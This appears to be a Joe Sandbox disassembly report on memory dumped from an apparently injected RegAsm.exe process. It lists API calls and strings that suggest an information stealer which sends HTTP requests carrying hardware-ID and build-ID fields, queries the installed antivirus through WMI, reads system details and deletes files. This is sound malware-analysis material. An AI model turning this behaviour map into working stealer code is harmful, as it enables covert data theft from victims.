ERROR, xrefs: 00415257
*, xrefs: 00415780
ERROR, xrefs: 00415485
ERROR, xrefs: 004155B1
ERROR, xrefs: 004152D8

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpylstrlen$Sleep
String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 1345713276-3681523784
Opcode ID: 7ee7a4225705314ce0bb3d68cd9a80c858fd4d736d994762bd60cc71e67fd3fc
Instruction ID: ee0954d6909aaf42f580de9b3dc84f2d6efd8a6f2c2388120a1c306aed01b760
Opcode Fuzzy Hash: 7ee7a4225705314ce0bb3d68cd9a80c858fd4d736d994762bd60cc71e67fd3fc
Instruction Fuzzy Hash: E6627670D05248EADB01EBE5CA4ABDE7BB89F15304F10419EF455B31C2DBB85B88CB66

Function 00403AF5 Relevance: 37.3, APIs: 13, Strings: 8, Instructions: 513
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00403AFA

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
StrCmpCA.SHLWAPI(?), ref: 00403BBC

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00426975,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
InternetCloseHandle.WININET(00000000), ref: 00404107
InternetCloseHandle.WININET(?), ref: 0040411C
InternetCloseHandle.WININET(?), ref: 00404125

Strings

------, xrefs: 00403EF7
", xrefs: 00403E7A
build_id, xrefs: 00403F9F
hwid, xrefs: 00403E50
", xrefs: 00403FC9
!, xrefs: 004040E6
------, xrefs: 00403C3E
------, xrefs: 00403DA8

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: !$"$"$------$------$------$build_id$hwid
API String ID: 1139859944-3346224549
Opcode ID: 30aaebd992676f2aa7ae6a6ee7e314caf3af7754b72d1f0f0f4156a8737da334
Instruction ID: 3f4b6d901fb2b8f95c9e3afc9557af72407c732f8d0fec62a55eb0a88ba48245
Opcode Fuzzy Hash: 30aaebd992676f2aa7ae6a6ee7e314caf3af7754b72d1f0f0f4156a8737da334
Instruction Fuzzy Hash: 41224571801149EEDB05EBE5C955AEEBBB8AF19308F10419EF50173182DFB82BC8DB65

Function 00407277 Relevance: 33.5, APIs: 22, Instructions: 511
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040727C

Part of subcall function 00410910: StrCmpCA.SHLWAPI(?,?,?,004096DF,00426E2C,00000000), ref: 00410919

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00426C24,?,?,?,00426BFA,?,00000000), ref: 004073E8

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00411E3E: _EH_prolog.MSVCRT ref: 00411E43
Part of subcall function 00411E3E: memset.MSVCRT ref: 00411E65
Part of subcall function 00411E3E: OpenProcess.KERNEL32(00001001,00000000,?,?,?), ref: 00411EEC
Part of subcall function 00411E3E: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00411EFA
Part of subcall function 00411E3E: CloseHandle.KERNEL32(00000000,?,?), ref: 00411F01

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004075DA
RtlAllocateHeap.NTDLL(00000000), ref: 004075E1
lstrcat.KERNEL32(00000000,00000000), ref: 004076FF
lstrcat.KERNEL32(00000000,00426C40), ref: 0040770D
lstrcat.KERNEL32(00000000,00000000), ref: 0040771F
lstrcat.KERNEL32(00000000,00426C44), ref: 0040772D
lstrlenA.KERNEL32(00000000), ref: 00407874
lstrlenA.KERNEL32(00000000), ref: 00407882

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

memset.MSVCRT ref: 004078DA
DeleteFileA.KERNEL32(00000000), ref: 004078FF

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
String ID:
API String ID: 4187064601-0
Opcode ID: 420e07143e74f736176b56749dc803c39542110a5146e416bbc9cfe120abf6a2
Instruction ID: 6e70194592704a8138ca5a8de9c4287eeae0ad470012b057b61369f79f447507
Opcode Fuzzy Hash: 420e07143e74f736176b56749dc803c39542110a5146e416bbc9cfe120abf6a2
Instruction Fuzzy Hash: B522CF31804149EEDF05EBE5DD5AAEEBB75AF15308F10405EF401721D2EFB82A88DB66

Function 00411564 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 155
memorycomtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00411569
CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 00411581
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 00411592
CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?), ref: 004115AC
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004115E2
VariantInit.OLEAUT32(?), ref: 0041163D

Part of subcall function 004114AC: _EH_prolog.MSVCRT ref: 004114B1
Part of subcall function 004114AC: CoCreateInstance.OLE32(00427E9C,00000000,00000001,004274E0,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004114D8
Part of subcall function 004114AC: SysAllocString.OLEAUT32(?), ref: 004114E5
Part of subcall function 004114AC: _wtoi64.MSVCRT ref: 00411520
Part of subcall function 004114AC: SysFreeString.OLEAUT32(?), ref: 00411533
Part of subcall function 004114AC: SysFreeString.OLEAUT32(00000000), ref: 0041153A

FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 00411675
GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784), ref: 0041167B
HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,0042779C,00000000,?,Work Dir: In memory), ref: 00411688
VariantClear.OLEAUT32(?), ref: 004116CA
wsprintfA.USER32 ref: 004116B4

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Strings

Unknown, xrefs: 004116FC
WQL, xrefs: 004115F7
ROOT\CIMV2, xrefs: 004115BF
Unknown, xrefs: 004116F5
Select * From Win32_OperatingSystem, xrefs: 004115F2
Unknown, xrefs: 004116D6
%d/%d/%d %d:%d:%d, xrefs: 004116AE
InstallDate, xrefs: 0041164F

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
API String ID: 2456697202-461178377
Opcode ID: e755b06c74eda406b13eb378eb6dd6d5d0cd1527c1b6474a9e65b12fdc8d7d05
Instruction ID: ae9411e671be8cb23ed68c5842b0e9f412c6a2781a55fc7e069c055b93801e12
Opcode Fuzzy Hash: e755b06c74eda406b13eb378eb6dd6d5d0cd1527c1b6474a9e65b12fdc8d7d05
Instruction Fuzzy Hash: DB517C71A01228BBCB20DF95DC49EEFBFBCEF09B11F504106F611A6190C7799A41CBA8

Function 00404F2A Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 174
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00404F2F

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
StrCmpCA.SHLWAPI(?), ref: 00404FA6
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004050D2
InternetCloseHandle.WININET(00000000), ref: 004050DD
InternetCloseHandle.WININET(?), ref: 004050E6
InternetCloseHandle.WININET(?), ref: 004050EF

Strings

GET, xrefs: 00404FF7
ERROR, xrefs: 00405059
ERROR, xrefs: 00405140

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 2435781452-2509457195
Opcode ID: 1a92ccbac519f21515b010ee829a9c90af2a3be3ea6a7272d9bca599a976676f
Instruction ID: d1f17326ea2cf28898f048348349d2df5afab327e1f2dbb02098ea821e195baf
Opcode Fuzzy Hash: 1a92ccbac519f21515b010ee829a9c90af2a3be3ea6a7272d9bca599a976676f
Instruction Fuzzy Hash: 1B516D71900119AFEB11DFA0DC85EFFBBBDEB05344F10402AF601A6191DB795E84CBA5

Function 0041170D Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 125
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 00411712
CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?,00000000), ref: 0041172A
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000), ref: 0041173B
CoCreateInstance.OLE32(004280EC,00000000,00000001,0042801C,?,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000,?), ref: 00411755
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?), ref: 0041178B
VariantInit.OLEAUT32(?), ref: 004117DE

Part of subcall function 00411A75: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00411805,?,?,00000000,0042779C,00000000,?,Work Dir: In memory,00000000,?,00427784,00000000), ref: 00411A7D
Part of subcall function 00411A75: CharToOemW.USER32(?,00000000), ref: 00411A89

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

VariantClear.OLEAUT32(?), ref: 00411813

Strings

Select * From AntiVirusProduct, xrefs: 0041179B
Unknown, xrefs: 00411845
WQL, xrefs: 004117A0
displayName, xrefs: 004117F0
Unknown, xrefs: 0041181F
root\SecurityCenter2, xrefs: 00411768
Unknown, xrefs: 0041183E

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prologInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 3694693100-315474579
Opcode ID: bdccf08652369387e42b06f21db0e1d9143e0328e5483ada23e33f9ea037bb3e
Instruction ID: cdbe02839844cbb281c6cbe25b28e4a03c3700f38dd34abeedc1445e8ae81cff
Opcode Fuzzy Hash: bdccf08652369387e42b06f21db0e1d9143e0328e5483ada23e33f9ea037bb3e
Instruction Fuzzy Hash: F1414C71A01229BBCB10EF95DC49EEF7F78EF49B21F60810AF115A6190C7785A41CBA8

Function 00410E59 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 178registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410E5E

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0042731F,00000001,00000000), ref: 00410EA6
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410EF0
wsprintfA.USER32 ref: 00410F1A
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 00410F37
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410F61
lstrlenA.KERNEL32(?), ref: 00410F76
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,00427348), ref: 00410FF6

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Strings

%s\%s, xrefs: 00410F14
- , xrefs: 00411000
?, xrefs: 00410E9C

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenQueryValuelstrcpy$EnumH_prologlstrlenwsprintf
String ID: - $%s\%s$?
API String ID: 404191982-3278919252
Opcode ID: 42eb76426bad67a141e30503dc5f21c1f1b9ccbcfb3092c8fdf965fc4b4971f1
Instruction ID: 939cb2b353aebe516f98e05683f7fa7186676c94004d9447f4d5b867d2a871e3
Opcode Fuzzy Hash: 42eb76426bad67a141e30503dc5f21c1f1b9ccbcfb3092c8fdf965fc4b4971f1
Instruction Fuzzy Hash: 4A71367180025DEEDF11EFA1CD84AEEBBBDBF19304F00005AE506B2151EB785A88CB65

Function 004112C5 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004112CA
GetWindowsDirectoryA.KERNEL32(?,00000104,00000001,?,00000000), ref: 004112ED
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 0041131F
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00411362
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00411369
wsprintfA.USER32 ref: 00411395
lstrcat.KERNEL32(00000000,004272F8), ref: 004113A4

Part of subcall function 0041128A: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041129B

lstrlenA.KERNEL32(00000000), ref: 004113C3

Part of subcall function 00411F3C: malloc.MSVCRT ref: 00411F4A
Part of subcall function 00411F3C: strncpy.MSVCRT ref: 00411F5A

lstrcat.KERNEL32(00000000,00000000), ref: 004113F0

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Strings

C, xrefs: 004112F7
:\, xrefs: 00411315

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryH_prologInformationProcessProfileVolumeWindowslstrcpylstrlenmallocstrncpywsprintf
String ID: :\$C
API String ID: 688099012-3309953409
Opcode ID: 8b389af257ad2d7fc35aa98ad9877c37e6ff06556f6bc13ac2ef4079480c52c3
Instruction ID: b01806ac1240bb61ec39001f631bf746401bef9c976af08fb877b9c07554aa4e
Opcode Fuzzy Hash: 8b389af257ad2d7fc35aa98ad9877c37e6ff06556f6bc13ac2ef4079480c52c3
Instruction Fuzzy Hash: 7C41CF71801158AACB11EFE5DD89DEFBBBDEF4A304F10005EF615A3161EA384B84CBA5

Function 00413E88 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 116stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00413E8D

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00404F2A: _EH_prolog.MSVCRT ref: 00404F2F
Part of subcall function 00404F2A: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404F92
Part of subcall function 00404F2A: StrCmpCA.SHLWAPI(?), ref: 00404FA6
Part of subcall function 00404F2A: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FC9
Part of subcall function 00404F2A: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404FFF
Part of subcall function 00404F2A: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405023
Part of subcall function 00404F2A: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040502E
Part of subcall function 00404F2A: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040504C

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F0F
lstrlenA.KERNEL32(00000000), ref: 00413F26

Part of subcall function 00411B55: LocalAlloc.KERNEL32(00000040,?,000000C8,00000001,?,00413F3B,00000000,00000000), ref: 00411B6E

StrStrA.SHLWAPI(00000000,00000000), ref: 00413F4D
lstrlenA.KERNEL32(00000000), ref: 00413F62
lstrlenA.KERNEL32(00000000), ref: 00413F7D

Strings

ERROR, xrefs: 00413FA1
ERROR, xrefs: 00413F01
ERROR, xrefs: 00413FAF
ERROR, xrefs: 00413F8D
ERROR, xrefs: 00413FA8

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

